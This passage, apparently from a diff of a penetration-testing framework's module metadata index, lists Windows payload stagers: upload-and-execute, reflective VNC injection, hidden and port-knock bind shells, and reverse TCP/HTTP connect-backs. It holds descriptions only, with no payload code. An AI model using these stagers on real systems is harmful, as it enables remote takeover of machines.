"windows/reverse_tcp_allports" - }, - "payload_windows/upexec/reverse_tcp_dns": { - "name": "Windows Upload/Execute, Reverse TCP Stager (DNS)", - "fullname": "payload/windows/upexec/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "RageLtMan" - ], - "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - 
"path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", - "is_install_path": true, - "ref_name": "windows/upexec/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_windows/upexec/reverse_tcp_rc4": { - "name": "Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/upexec/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/upexec/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_windows/upexec/reverse_tcp_rc4_dns": { - "name": "Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/windows/upexec/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": 
null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", - "is_install_path": true, - "ref_name": "windows/upexec/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_windows/upexec/reverse_tcp_uuid": { - "name": "Windows Upload/Execute, Reverse TCP Stager with UUID Support", - "fullname": "payload/windows/upexec/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/upexec/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_windows/upexec/reverse_udp": { - "name": "Windows Upload/Execute, Reverse UDP Stager with UUID Support", - "fullname": "payload/windows/upexec/reverse_udp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "RageLtMan " - ], - "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker with UUID 
Support", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_udp.rb", - "is_install_path": true, - "ref_name": "windows/upexec/reverse_udp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_udp" - }, - "payload_windows/vncinject/bind_hidden_ipknock_tcp": { - "name": "VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager", - "fullname": "payload/windows/vncinject/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. 
The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection", - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_windows/vncinject/bind_hidden_tcp": { - "name": "VNC Server (Reflective Injection), Hidden Bind TCP Stager", - "fullname": "payload/windows/vncinject/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection", - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/bind_hidden_tcp", - "check": false, - 
"post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_windows/vncinject/bind_ipv6_tcp": { - "name": "VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/windows/vncinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for an IPv6 connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_windows/vncinject/bind_ipv6_tcp_uuid": { - "name": "VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/vncinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "OJ Reeves" - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - 
"URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_windows/vncinject/bind_named_pipe": { - "name": "VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager", - "fullname": "payload/windows/vncinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "UserExistsError" - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a pipe connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_windows/vncinject/bind_nonx_tcp": { - "name": "VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)", - "fullname": 
"payload/windows/vncinject/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "vlad902 " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection (No NX)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_windows/vncinject/bind_tcp": { - "name": "VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)", - "fullname": "payload/windows/vncinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": 
false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_tcp" - }, - "payload_windows/vncinject/bind_tcp_rc4": { - "name": "VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/vncinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_windows/vncinject/bind_tcp_uuid": { - "name": "VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/vncinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - 
"autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_windows/vncinject/find_tag": { - "name": "VNC Server (Reflective Injection), Find Tag Ordinal Stager", - "fullname": "payload/windows/vncinject/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "skape " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nUse an established connection", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/findtag_ord.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/findtag_ord" - }, - "payload_windows/vncinject/reverse_http": { - "name": "VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)", - "fullname": "payload/windows/vncinject/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTunnel 
communication over HTTP (Windows wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_http.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_http" - }, - "payload_windows/vncinject/reverse_http_proxy_pstore": { - "name": "VNC Server (Reflective Injection), Reverse HTTP Stager Proxy", - "fullname": "payload/windows/vncinject/reverse_http_proxy_pstore", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTunnel communication over HTTP", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/reverse_http_proxy_pstore", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_http_proxy_pstore" - }, - 
"payload_windows/vncinject/reverse_ipv6_tcp": { - "name": "VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)", - "fullname": "payload/windows/vncinject/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker over IPv6", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_windows/vncinject/reverse_nonx_tcp": { - "name": "VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/windows/vncinject/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "vlad902 " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker (No NX)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", - "is_install_path": 
true, - "ref_name": "windows/vncinject/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_windows/vncinject/reverse_ord_tcp": { - "name": "VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/windows/vncinject/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "spoonm " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_windows/vncinject/reverse_tcp": { - "name": "VNC Server (Reflective Injection), Reverse TCP Stager", - "fullname": "payload/windows/vncinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - 
"URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_tcp" - }, - "payload_windows/vncinject/reverse_tcp_allports": { - "name": "VNC Server (Reflective Injection), Reverse All-Port TCP Stager", - "fullname": "payload/windows/vncinject/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_windows/vncinject/reverse_tcp_dns": { - "name": "VNC Server (Reflective Injection), Reverse TCP Stager (DNS)", - 
"fullname": "payload/windows/vncinject/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "RageLtMan" - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_windows/vncinject/reverse_tcp_rc4": { - "name": "VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/vncinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/reverse_tcp_rc4", - "check": false, - 
"post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_windows/vncinject/reverse_tcp_rc4_dns": { - "name": "VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/windows/vncinject/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_windows/vncinject/reverse_tcp_uuid": { - "name": "VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support", - "fullname": "payload/windows/vncinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker with UUID Support", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", 
- "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_windows/vncinject/reverse_winhttp": { - "name": "VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)", - "fullname": "payload/windows/vncinject/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "Borja Merino " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTunnel communication over HTTP (Windows winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_winhttp" - }, - "payload_windows/x64/custom/bind_ipv6_tcp": { - "name": "Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager", - "fullname": 
"payload/windows/x64/custom/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "sf " - ], - "description": "Custom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_windows/x64/custom/bind_ipv6_tcp_uuid": { - "name": "Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": 